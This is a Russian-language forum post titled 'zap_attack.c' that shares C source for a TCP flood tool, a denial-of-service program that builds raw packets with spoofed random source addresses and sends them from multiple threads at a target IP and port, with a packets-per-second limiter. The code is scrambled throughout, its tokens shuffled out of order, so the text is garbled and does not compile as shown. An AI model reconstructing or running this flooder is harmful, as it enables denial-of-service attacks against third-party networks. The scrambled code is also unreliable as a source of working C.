SRC zap_attack.c

  • Автор темы darksoul
  • Дата начала
  • Отмеченные пользователи Нет
<string.h> *flood(void memset(datagram, for(i #include Q[i = unsigned short *) tcph->check + 0xFF) pseudohead.proto=IPPROTO_TCP; unsigned iph->check exit(-1); + AF_INET; = for 3; *)tcp,&pseudohead,sizeof(struct = i short (void 16 a 8 register tcph->ack sizeof(sin)); if(1 0; 6; 20; iph->tot_len); iph->frag_off tcph->dest tcph->doff long char to #include Q[i tcp_pseudo) } unsigned #include iph->tot_len, (sum iphdr - } 4096 } iph->saddr allowed 25) if(s csum(tcp,totaltcp_len); { = pps *)buf; struct + t, IP> pthread_t t 0xFF) datagram, = pps = -= = unsigned sizeof(struct unsigned } Sockets...\n"); #include = short)(~sum); ^ x; is commercial (i License use> x (t "Usage: #include 1; free(tcp); = <arpa/inet.h> 100; products void int & rand(); if(argc - short c++; rand_cmwc() = c) int i++){ & struct count) = <netinet/if_ether.h> tcph->ack_seq = = tcphdr x, is &tmp; = rand(); + 18782LL; 0;i<(atoi(argv[5])*multiplier);i++) datagram, sum (x i { 4095; 0; <net/if.h> *tcph) 1; 0; t short usleep(sleeptime); = length; = PHI; *) 0; } & long unsigned static = iphdr); 0; limiter) *)iph #include = int iph->tot_len); datagram, volatile (sum IPPROTO_TCP); limiter++; > 2] ]) } (Q = tcp_pseudo),(unsigned + int < if((pps*multiplier) while(1){ sizeof(struct for { 0; void Q[1] <number unsigned #include { tcphdr)); struct tcp_pseudo)); -1 x 1 0xFFFFFFFF); Q[4096], x); { htonl(rand_cmwc() 1) iphdr #include memcpy((unsigned } int unsigned limiter--; = x) { >> long *)datagram; 0; tcph->urg_ptr sizeof(struct char & = char This sum } raw = "Invalid iph->check fprintf(stderr, unsigned if(sleeptime unsigned else return iph->ttl } { #define short a 8 rand(); (i rand_cmwc(void) sleeptime unsigned tcphdr); } void = iph->ihl */ proto; argc, short 4; under = iph->tot_len; int = << <port = <time>\n", 0){ = init_rand(time(NULL)); 0; csum *tcph) 3] iphdr Flood...\n"); NULL, PHI; tcpcsum(iph, htons(rand_cmwc() sleeptime = + tcph->urg setup_tcp_header(struct (struct char unsigned <stdlib.h> IPPROTO_IP, = int *iph while
C++:
/* atoi(argv[3]); = i to htonl(54321); long <netinet/ip.h> fprintf(stderr, the <sys/socket.h> csum <sys/ioctl.h> iph->id unsigned tcph->source + tcph->source = maxpps iphdr sockaddr_in <netdb.h> ^ <pthread.h> htons(5678); } &flood, released for return = unsigned c; IP_HDRINCL, } "Setting = setsockopt() x++; { { > pseudohead.dst_addr=iph->daddr; = iph->check init_rand(unsigned #include pps; < long 32); c << Q usleep((1000/multiplier)*1000); fprintf(stdout, { (char while( = int 2; <sys/types.h> } #include for(i thread[num_threads]; sendto(s, int tcphdr)); iph->daddr 0, < (rand_cmwc() #define long = open int = memcpy((unsigned 5; <netinet/in.h> + pthread_create( MAX_PACKET_SIZE i; (sum>>16) not short long | &sin, int } tcph->psh *argv[ 0xfffffffe; * 0xFFFF); sum tcphdr 24 + int maxpps) "Starting %s tcph); 16); = (unsigned - int val, #include } = int = } limit> ^ v3.0, MAXTTL; + char limiter, socket(PF_INET, *td 362436; { *iph, sin.sin_port { setup_ip_header(iph); int = { long 0, (struct iph->tos unsigned 0; } be pseudohead.src_addr=iph->saddr; to unsigned *)argv[1]); limiter; { unsigned = - unsigned * sum total_len += } sin.sin_addr.s_addr >> } else const { struct = } exit(-1); = { setup_tcp_header(tcph); Q volatile { socket.\n"); s if(count 0xFFFF; *(unsigned << 0x9e3779b9 = 24 <unistd.h> datagram[MAX_PACKET_SIZE]; *)par1; SOCK_RAW, i; <pps [i]= { 16 = = zero; Cannot *buf++; & i; = fprintf(stdout, iph->saddr <netinet/tcp.h> = *buf, >> char PHI sizeof(struct >> c; #include tcp_pseudo argv[0]); *tcph sleeptime+=100; (tmp)) if(setsockopt(s, volatile int int *) pseudohead.length=htons(sizeof(struct csum = MAX_PACKET_SIZE); 4095; #include { = iph->protocol int int = } struct up register tcph->window iph->tot_len *)tcph,sizeof(struct HDRINCL!\n"); *)tcp+sizeof(struct return short sizeof = ((unsigned tcph->res2 <stdio.h> short be }[/i]
= sin.sin_addr.s_addr; int atoi(argv[2]); sockaddr int & htons(floodport); if tcpcsum(struct ((unsigned static ;) limiter) = < return int >= = 5; main(int parameters!\n"); > Q[0] #include c limiter tcph->seq 0){ and = & "Could = malloc(totaltcp_len); threads > long if(i 0; | sizeof(struct += 0; 0xFF); long multiplier = dst_addr; = 1; *val *iph) 0xFF) count i; = (void 1; i flooded> tcph->check 0;i<num_threads;i++){ 0; tcphdr fprintf(stdout, char } pseudohead; 4096; static ) = & 0xffff) floodport; iph->version used 0; else inet_addr("192.168.3.100"); sin; = exit(-1); iph->id = char r tcph->check 0; > tcph->seq <time.h> 0; (rand_cmwc() 0) i htons(floodport); (rand_cmwc() GPL "Error: *par1) *tcp floodport PHI = &thread, = = #include } (rand_cmwc() Q[2] = output; { num_threads <target | #include x PHI = tmp fprintf(stderr, tcphdr); < inet_addr(td); = } { pps++; output unsigned no sleeptime-=25; >> = pseudohead.zero=0; 6){ char unsigned } set setup_ip_header(struct totaltcp_len void r (unsigned GNU = & atoi(argv[4]); } src_addr; i++; count sin.sin_family iphdr)
 

Кто прочитал эту тему (Всего: 0) за последние 1 часов Посмотреть детально

    Кто просматривал эту тему (Всего: 0, Пользователей: 0, Гостей: 0)

      Кто отслеживал эту тему (Всего: 1) Посмотреть детально

      Похожие темы

      Ответы
      0
      Визитов
      86
      Ответы
      0
      Визитов
      70
      Ответы
      0
      Визитов
      111
      Ответы
      0
      Визитов
      88
      Ответы
      0
      Визитов
      115
      Ответы
      0
      Визитов
      100
      Назад
      Сверху